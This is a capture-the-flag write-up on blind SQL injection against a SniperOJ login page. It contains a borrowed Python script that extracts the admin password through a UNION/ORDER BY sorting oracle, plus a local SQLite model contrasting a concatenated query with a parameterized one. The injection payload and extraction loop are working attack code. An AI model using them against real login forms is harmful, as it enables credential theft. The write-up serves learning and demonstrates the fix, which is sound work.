`http://web2.sniperoj.cn:10004/?username&password`
Information obtained: "Flag is the password of admin!"
So the next step should be to get admin's password, which must mean injection.
Judging from the challenge, it should be a blind injection. I tried a few approaches, but I don't quite understand why my payload didn't behave as I expected; I also tested locally, and it worked there... so I was rather frustrated and borrowed someone else's script from the net:
```python
#!/usr/bin/python3
# coding:utf-8
import requests


def makeStr(begin, end):
    # Candidate characters chr(begin) .. chr(end-1)
    s = ""
    for i in range(begin, end):
        s += chr(i)
    return s


def getPassword():
    url = "http://web2.sniperoj.cn:10004/index.php?username="
    testStr = makeStr(48, 127)  # '0' .. '~'
    # UNION a fake row whose third column is the hex-encoded guess and sort
    # on that column descending; the page only renders the first row.
    username = "admin' union distinct select 1,2,0x{hex} order by 3 desc%23&password=1"
    flag = ""
    for _ in range(32):
        for i in testStr:
            data = username.format(hex=(flag + i).encode().hex())
            res = requests.post(url + data)
            # If the fake row sorts first, "admin" disappears from the page:
            # the guess is greater than the real password, so the previous
            # character in the candidate range is the correct one.
            if "admin" not in res.text:
                flag = flag + chr(ord(i) - 1)
                print(flag)
                break


if __name__ == '__main__':
    getPassword()
```
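To see exactly what that script relies on, here is an added local model of the challenge backend (my own code, not the writeup's script or the challenge's source). It builds an in-memory SQLite table with a made-up admin password, exposes the same concatenated login query the script assumes, runs the ORDER BY oracle against it, and then runs the same loop against a parameterized version of the query. SQLite needs three changes to the MySQL payload: `--` instead of `#` for the comment, `CAST(x'..' AS TEXT)` for the hex literal, and an extra `, 1 DESC` tie-breaker (fake id 0 below the real id 1) so that an exact match shows the real row first rather than depending on unspecified tie ordering. The secret value, table layout and the `0'..'~'` candidate range are assumptions.

```python
import sqlite3

# Constructed stand-in for the challenge's admin password (not the real flag).
SECRET = "flag{0rder_by_0racle}"
CANDIDATES = [chr(c) for c in range(48, 127)]  # same '0'..'~' range the script tests


def make_db():
    """In-memory users table with one admin row, modelling the challenge backend."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', ?)", (SECRET,))
    return con


def vulnerable_login(con, username, password):
    """String-concatenated query; renders the first row's username like the challenge page."""
    sql = ("SELECT id, username, password FROM users "
           "WHERE username='%s' AND password='%s'" % (username, password))
    row = con.execute(sql).fetchone()
    return str(row[1]) if row else "login failed"


def safe_login(con, username, password):
    """Same query with bound parameters: the input can no longer alter the statement."""
    sql = "SELECT id, username, password FROM users WHERE username=? AND password=?"
    row = con.execute(sql, (username, password)).fetchone()
    return str(row[1]) if row else "login failed"


def payload(guess):
    """UNION a fake row whose 3rd column is the hex-encoded guess, sort on that column.
    Fake id 0 and ', 1 DESC' make the real row win ties (guess == secret)."""
    return ("admin' UNION SELECT 0, 'fake', CAST(x'%s' AS TEXT) "
            "ORDER BY 3 DESC, 1 DESC -- " % guess.encode().hex())


def injected_row_first(login, guess):
    """The oracle: the fake row sorted first iff 'admin' is missing from the page."""
    return "admin" not in login(payload(guess), "irrelevant")


def recover(login, max_len=32):
    """Reproduce the script's loop against a login function; returns what the oracle leaks."""
    flag = ""
    for _ in range(max_len):
        for i, c in enumerate(CANDIDATES):
            if injected_row_first(login, flag + c):
                if i == 0:
                    # Even the lowest candidate sorts above the secret, so the
                    # prefix found so far is already the whole secret.
                    return flag
                flag += CANDIDATES[i - 1]
                break
        else:
            # Nothing sorted above the secret: next char is outside the tested range.
            return flag
    return flag


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", recover(lambda u, p: vulnerable_login(db, u, p)))
    print("parameterized:", repr(recover(lambda u, p: safe_login(db, u, p))))
```

Against `vulnerable_login` the loop reproduces the secret character by character; against `safe_login` the whole payload is just a username literal, no row matches, and the loop stops immediately with an empty string. The `i == 0` check also closes a gap in the original script, which keeps appending `'/'` once the full password has been found.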